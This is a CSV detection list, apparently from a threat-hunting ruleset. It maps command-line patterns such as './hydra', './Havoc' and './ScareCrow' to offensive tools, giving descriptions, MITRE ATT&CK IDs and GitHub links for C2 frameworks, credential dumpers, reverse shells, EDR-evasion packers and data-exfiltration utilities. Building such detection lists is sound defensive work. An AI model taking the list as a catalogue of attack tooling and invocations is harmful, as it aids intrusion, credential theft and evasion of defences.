"*./fee.py*",".{0,1000}\.\/fee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*./gcr.py*",".{0,1000}\.\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" 
"*./getExploit*",".{0,1000}\.\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","44","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*./gimmeSH*",".{0,1000}\.\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","183","29","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*./go-secdump*",".{0,1000}\.\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*./GoStompy *",".{0,1000}\.\/GoStompy\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*./hashcat -*",".{0,1000}\.\/hashcat\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - 
TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*./hashview/*",".{0,1000}\.\/hashview\/.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*./Havoc",".{0,1000}\.\/Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*./havoc *",".{0,1000}\.\/havoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*./hoaxshell*",".{0,1000}\.\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*./hping *",".{0,1000}\.\/hping\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*./hydra *",".{0,1000}\.\/hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*./inceptor.py*",".{0,1000}\.\/inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*./injector -*",".{0,1000}\.\/injector\s\-.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*./iodined*",".{0,1000}\.\/iodined.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*./Ivy -*",".{0,1000}\.\/Ivy\s\-.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*./kali-install.sh*",".{0,1000}\.\/kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*./kerbrute *",".{0,1000}\.\/kerbrute\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*./koadic*",".{0,1000}\.\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*./kubestroyer*",".{0,1000}\.\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*./Lalin.sh*",".{0,1000}\.\/Lalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*./litefuzz.py*",".{0,1000}\.\/litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*./logger.sh * &> /dev/null && exit*",".{0,1000}\.\/logger\.sh\s.{0,1000}\s\&\>\s\/dev\/null\s\&\&\sexit.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*./lse.sh*",".{0,1000}\.\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*./manjusaka*",".{0,1000}\.\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*./Microsploit*",".{0,1000}\.\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*./monkey.sh*",".{0,1000}\.\/monkey\.sh.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*./mythic-cli *",".{0,1000}\.\/mythic\-cli\s.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","271","40","2024-04-29T01:01:05Z","2022-03-07T20:35:33Z" "*./Ninja.py*",".{0,1000}\.\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - 
TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*./ntdissector*",".{0,1000}\.\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*./nysm/src/",".{0,1000}\.\/nysm\/src\/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*./pachine.py*",".{0,1000}\.\/pachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "*./Passdetective*",".{0,1000}\.\/Passdetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*./Pcredz *",".{0,1000}\.\/Pcredz\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*./PEzor.sh*",".{0,1000}\.\/PEzor\.sh.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*./Phishing.sh*",".{0,1000}\.\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*./pwndrop *",".{0,1000}\.\/pwndrop\s.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*./PyShell *",".{0,1000}\.\/PyShell\s.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","0","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*./recv -d :50001*",".{0,1000}\.\/recv\s\-d\s\:50001.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*./RedGuard*",".{0,1000}\.\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*./redirector.py *",".{0,1000}\.\/redirector\.py\s.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*./reverse-ssh*",".{0,1000}\.\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*./rpcrt.py*",".{0,1000}\.\/rpcrt\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*./rsockstun*",".{0,1000}\.\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*./rsocx -*",".{0,1000}\.\/rsocx\s\-.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*./rwf.py*",".{0,1000}\.\/rwf\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*./scan4all *",".{0,1000}\.\/scan4all\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*./scan4all*",".{0,1000}\.\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*./ScareCrow *",".{0,1000}\.\/ScareCrow\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*./ScareCrow -*",".{0,1000}\.\/ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*./ScareCrow*",".{0,1000}\.\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*./send -d *:123 -f *",".{0,1000}\.\/send\s\-d\s.{0,1000}\:123\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*./seth.sh * *",".{0,1000}\.\/seth\.sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - 
T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*./slip.py *",".{0,1000}\.\/slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*./sliver-client_linux*",".{0,1000}\.\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*./snaffler_downloads*",".{0,1000}\.\/snaffler_downloads.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*./snake",".{0,1000}\.\/snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*./SourcePoint *",".{0,1000}\.\/SourcePoint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" 
